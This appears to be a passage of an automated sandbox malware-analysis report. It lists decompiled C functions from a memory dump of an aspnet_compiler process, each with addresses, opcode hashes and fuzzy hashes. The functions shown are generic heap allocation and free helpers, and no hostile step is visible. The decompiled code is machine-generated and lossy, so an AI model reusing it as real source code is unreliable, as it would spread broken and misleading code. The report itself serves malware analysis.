                                                                                        • Instruction Fuzzy Hash: 75F0E93952578D9FDB7ACB1CC144B22B7D5AB08778F054468E50587913C724DD41C640
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011CA44B Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011CA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1287b9c; // 0x0
				_t15 = __ecx;
				_t16 = L011B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E011DFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                                        0x011ca44b
                                                                                        0x011ca453
                                                                                        0x011ca472
                                                                                        0x011ca476
                                                                                        0x00000000
                                                                                        0x011ca493
                                                                                        0x011ca47a
                                                                                        0x011ca47f
                                                                                        0x011ca486
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d97fd9f0c1c9b9808288996709492e91dc50ad1419069e83fb1d8d225766e74c
                                                                                        • Instruction ID: b3526aef7d43bca7c6b988d333471652036bb148f3e432741746792574e1e149
                                                                                        • Opcode Fuzzy Hash: d97fd9f0c1c9b9808288996709492e91dc50ad1419069e83fb1d8d225766e74c
                                                                                        • Instruction Fuzzy Hash: 14E09272A01422ABD2265E18BC00F66B39EDFE5A55F1E4039E605C7214E728DD02C7E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0119F358 Relevance: .0, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 79%
                                                                                        			E0119F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E011CF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L011B4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                                        0x0119f35d
                                                                                        0x0119f361
                                                                                        0x0119f367
                                                                                        0x0119f372
                                                                                        0x0119f38c
                                                                                        0x0119f38c
                                                                                        0x0119f394

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                        • Instruction ID: 1af95b5ea926ffe927cb36ec3e49cc826461b7b24b9d33ce4e894d58ba388ce6
                                                                                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                        • Instruction Fuzzy Hash: D7E0DF32A40119FBDB25AAD99E05FAABFADDB58A60F004195FA04D7190D6649E00C2D1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011AFF60 Relevance: .0, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011AFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x11711a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E012688F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E011B0050(_t14);
				}
			}










                                                                                        0x011aff66
                                                                                        0x011aff6b
                                                                                        0x00000000
                                                                                        0x011aff8f
                                                                                        0x00000000
                                                                                        0x011aff8f

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 06a2e0cd2097d57a6f9dbae5e2cee4de4445d6b44b77dee64da9a71c0ff3d7a4
                                                                                        • Instruction ID: 59db15ed04831df117ce84f889de74507c5ab0bd26835a1cb0fc326e304e3f59
                                                                                        • Opcode Fuzzy Hash: 06a2e0cd2097d57a6f9dbae5e2cee4de4445d6b44b77dee64da9a71c0ff3d7a4
                                                                                        • Instruction Fuzzy Hash: CDE0DFBA2053069FD73DDB69E1C0F2D3FAC9B52621F5A801DE0088B102C722D882C287
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012241E8 Relevance: .0, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 82%
                                                                                        			E012241E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x12708f0);
				_t5 = E011ED08C(__ebx, __edi, __esi);
				if( *0x12887ec == 0) {
					E011AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x12887ec == 0) {
						 *0x12887f0 = 0x12887ec;
						 *0x12887ec = 0x12887ec;
						 *0x12887e8 = 0x12887e4;
						 *0x12887e4 = 0x12887e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01224248();
				}
				return E011ED0D1(_t5);
			}





                                                                                        0x012241e8
                                                                                        0x012241ea
                                                                                        0x012241ef
                                                                                        0x012241fb
                                                                                        0x01224206
                                                                                        0x0122420b
                                                                                        0x01224216
                                                                                        0x0122421d
                                                                                        0x01224222
                                                                                        0x0122422c
                                                                                        0x01224231
                                                                                        0x01224231
                                                                                        0x01224236
                                                                                        0x0122423d
                                                                                        0x0122423d
                                                                                        0x01224247

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 59509dc1c520e4b001943c63de743453e607374e531393fa2580803a82bcacf6
                                                                                        • Instruction ID: 4f29d63ad170d7274c85e348d536009daba6640a35672c8e6251c2e66a4db139
                                                                                        • Opcode Fuzzy Hash: 59509dc1c520e4b001943c63de743453e607374e531393fa2580803a82bcacf6
                                                                                        • Instruction Fuzzy Hash: 17F0157E862741DFCBB8FFAAA50871C3AB4F755B14FC0421AD1008B288C73444A4CF01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0124D380 Relevance: .0, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0124D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0119E8B0(__ecx, _a4, 0xfff);
					L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                                        0x0124d38a
                                                                                        0x0124d39b
                                                                                        0x0124d3b1
                                                                                        0x00000000
                                                                                        0x0124d3b6
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                        • Instruction ID: ba613698e402c2fb6d8821e0b7599f68b8ee73beab272f69ed079db93ac98d3d
                                                                                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                        • Instruction Fuzzy Hash: DCE0C231291649FBDF266F84CC00FA97B16DB607A4F104031FE085E6E1C6719C91DAC4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011CA185 Relevance: .0, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011CA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x12867e4 >= 0xa) {
					if(_t5 < 0x1286800 || _t5 >= 0x1286900) {
						return L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E011B0010(0x12867e0, _t5);
				}
			}





                                                                                        0x011ca190
                                                                                        0x011ca1a6
                                                                                        0x011ca1c2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011ca192
                                                                                        0x011ca192
                                                                                        0x011ca19f
                                                                                        0x011ca19f

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 74f7386b649b8ac58d0d3a3389126b905f89258fce6d2cee8851987e7e9e146e
                                                                                        • Instruction ID: 17301a8a162b3ebfb1abb1bc89f2028089aabe9c20aad2bc2c8c6d0badc78bec
                                                                                        • Opcode Fuzzy Hash: 74f7386b649b8ac58d0d3a3389126b905f89258fce6d2cee8851987e7e9e146e
                                                                                        • Instruction Fuzzy Hash: C2D02EA11320441AC72E3350B8B8B263222FBE4FA0F34080CF2070F9E0FB60CCD48249
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C16E0 Relevance: .0, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011C16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E011C1710(0x12867e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L011B4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                                        0x011c16e8
                                                                                        0x011c16ef
                                                                                        0x011c16f3
                                                                                        0x011c16fe
                                                                                        0x00000000
                                                                                        0x011c1700
                                                                                        0x011c170d
                                                                                        0x011c170d
                                                                                        0x011c16f2
                                                                                        0x011c16f2
                                                                                        0x011c16f2
                                                                                        0x011c16f2

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7654e43563eb7e9f13aa7c94671f8296ff3c0d5f659680755711247083eb2193
                                                                                        • Instruction ID: c78560b09285dd51d035a72f3ffc98a4569eba0026e2d0c5864be5827b0a5809
                                                                                        • Opcode Fuzzy Hash: 7654e43563eb7e9f13aa7c94671f8296ff3c0d5f659680755711247083eb2193
                                                                                        • Instruction Fuzzy Hash: F1D0A731181201F2EA2D6B149844B183652EBA0F85F38005CF20B498C2CFF0CC92E048
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012153CA Relevance: .0, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E012153CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E011AEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                                        0x012153ca
                                                                                        0x012153ce
                                                                                        0x012153d9
                                                                                        0x012153de
                                                                                        0x012153e1
                                                                                        0x012153e1
                                                                                        0x012153e6
                                                                                        0x012153f3
                                                                                        0x00000000
                                                                                        0x012153f8
                                                                                        0x012153fb

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                        • Instruction ID: d692fd4e277b49c85cbabad1865613fec6ddd1493db1aa7e8cd6644c249d1e2d
                                                                                        • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                        • Instruction Fuzzy Hash: 65E08C319506819BCF16EB48C694F4EBBF5FB95B00F180044E1085F660C724AC00CB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011AAAB0 Relevance: .0, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011AAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                                        0x011aaab6
                                                                                        0x011aaabb
                                                                                        0x011fa442
                                                                                        0x00000000
                                                                                        0x011fa448
                                                                                        0x011fa454
                                                                                        0x011fa454
                                                                                        0x011aaac1
                                                                                        0x011aaac1
                                                                                        0x011aaac6
                                                                                        0x011aaac6

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                        • Instruction ID: 1dd2c02843ad6d221afe970cb3bd98b019d240b223cfde0812f5f2c4313e975a
                                                                                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                        • Instruction Fuzzy Hash: D7D0E939352A80CFD61BCF5DD564B1577A4BF44B44FC50494E505CB762E72CDD44CA10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C35A1 Relevance: .0, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011C35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E011AEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                                        0x011c35a1
                                                                                        0x011c35a1
                                                                                        0x011c35a5
                                                                                        0x011c35ab
                                                                                        0x011c35ab
                                                                                        0x011c35b5
                                                                                        0x00000000
                                                                                        0x011c35c1
                                                                                        0x011c35b7

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                        • Instruction ID: 713ce3fdf7c172db1daf0921239d90cb8995bfceb919220036153259297fafd4
                                                                                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                        • Instruction Fuzzy Hash: 04D0A9314621819EEB0EAB14C2287683BB2BB30A0CF98A06DC01206C52C33A4A0ACE01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0119DB40 Relevance: .0, Instructions: 11COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0119DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L011B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                                        0x0119db4d
                                                                                        0x0119db54
                                                                                        0x0119db5f
                                                                                        0x0119db56
                                                                                        0x0119db56
                                                                                        0x0119db5c
                                                                                        0x0119db5c

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                        • Instruction ID: 96cccb7e77875240cca7502d1d20b94dc5aba427e6ecd98d88840cb0846e3b16
                                                                                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                        • Instruction Fuzzy Hash: 82C08C30290A01AAEF2A1F20CD01B403AA0BB11B05F8400A0A302DA4F0DB78D801E600
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0121A537 Relevance: .0, Instructions: 11COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0121A537(intOrPtr _a4, intOrPtr _a8) {

				return L011B8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                                        0x0121a553

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                        • Instruction ID: 22ff140c5d700417b7f2b6af60afe05881039165b834a18cba42ea718568677b
                                                                                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                        • Instruction Fuzzy Hash: C3C01232080248BBCB126E82CC01F867B2AEBA4B60F008010FA080A5608632E970EA84
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011B3A1C Relevance: .0, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011B3A1C(intOrPtr _a4) {
				void* _t5;

				return L011B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                                        0x011b3a35

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                        • Instruction ID: a12d4c110fbf71650ade9410e77113971cf37dc802aea2a36b9856d26e53d551
                                                                                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                        • Instruction Fuzzy Hash: ECC08C32080248BBC7126E41DC00F017B29E7A0B60F004020F6040A9618632EC60D588
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0119AD30 Relevance: .0, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0119AD30(intOrPtr _a4) {

				return L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                                        0x0119ad49

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                        • Instruction ID: 55402f4092efb170fe30a1d3ecd2e56207a137a8591ed4723d65eab0f5cc4254
                                                                                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                        • Instruction Fuzzy Hash: 41C08C32080688BBC7126A45CD40F017B29E7A0B60F000020F6040A6A18A32E860D588
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C36CC Relevance: .0, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011C36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L011B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                                        0x011c36d2
                                                                                        0x011c36e8
                                                                                        0x011c36d4
                                                                                        0x011c36e5
                                                                                        0x011c36e5

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                        • Instruction ID: 9bfcbeccc5ba5ff27a1394be26cbdf2f52fd1d3721246aaa327f6212e122bc43
                                                                                        • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                        • Instruction Fuzzy Hash: 4DC02B70160440FBD71D1F30CD40F147254F710F21F640358B231458F0D7289C00D100
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011A76E2 Relevance: .0, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011A76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                                        0x011a76e4
                                                                                        0x00000000
                                                                                        0x011a76f8
                                                                                        0x011a76fd

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
